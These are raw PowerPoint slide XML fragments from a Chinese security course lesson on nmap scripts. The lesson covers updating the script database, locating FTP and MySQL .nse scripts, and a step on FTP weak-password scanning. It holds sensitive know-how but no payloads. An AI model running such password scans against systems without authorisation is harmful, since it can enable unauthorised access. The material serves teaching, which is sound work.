              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="955040"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nmap脚本更新指令：nmap --script-updatedb，如图2-3-1所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="1600200"/>
            <a:ext cx="3638550" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="2247900"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="266700" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-1 脚本更新指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="266700" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查找nmap脚本：使用locate *.nse，如图2-3-2所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="3232785"/>
            <a:ext cx="4067175" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="6147435"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="266700" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-2 查找nmap脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>FTP弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="831850"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通过locate命令我们发现nmap脚本都是位于/usr/share/nmap/scripts/下的，我们要查找本次实验需要用的Ftp和MySQL我们可以使用特定的关键字进行查找。用“Locate *.nse | grep ftp”查找Ftp脚本，如图2-3-3所示；用“Locate *.nse | grep mysql”查找MySQL脚本，如图2-3-4所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="2585085"/>
            <a:ext cx="3619500" cy="1457325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4042410"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="266700" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-3 查找Ftp脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4410710"/>
            <a:ext cx="3762375" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6125210"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="266700" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-4 查找MySQL脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>FTP弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
